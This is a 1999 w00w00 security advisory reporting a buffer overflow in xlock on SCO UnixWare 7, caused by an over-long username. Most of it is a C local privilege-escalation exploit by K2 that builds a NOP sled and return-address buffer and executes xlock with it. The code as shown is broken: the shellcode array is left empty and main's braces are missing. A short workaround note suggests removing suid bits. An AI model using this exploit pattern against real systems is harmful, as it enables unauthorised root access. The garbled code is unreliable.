Subject: [w00giving '99 #7] UnixWare 7's xlock

w00w00 Security Development (WSD)

Discovered by: K2 ([email protected])

The xlock command on SCO's UnixWare 7 has improper bounds checking on the
username passed (via argv[1]), which can cause a buffer overflow when
a lengthy username is passed.

Exploit (by K2):

// UnixWare7 /usr/bin/xlock local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =

#define SIZE 1200
#define NOPDEF 601
#define DEFOFF -400

const char x86_nop=0x90;
long nop=NOPDEF,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[]) 
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer+nop, shell, strlen(shell));

    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("jmp = [0x%x]\toffset = [%d]\n",esp+offset,offset);
    execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);

    printf("exec failed!\n");
    return 0;


As stated in the previous advisory, wait for SCO to release a patch. 
Because of the /var/sadm permissions 
vulnerability we published earlier hasn't been fixed yet, be sure you
take off suid privileges on the backed up binary! =)

Hellos to the usuals

Back to Advisories
Back to w00w00 webpage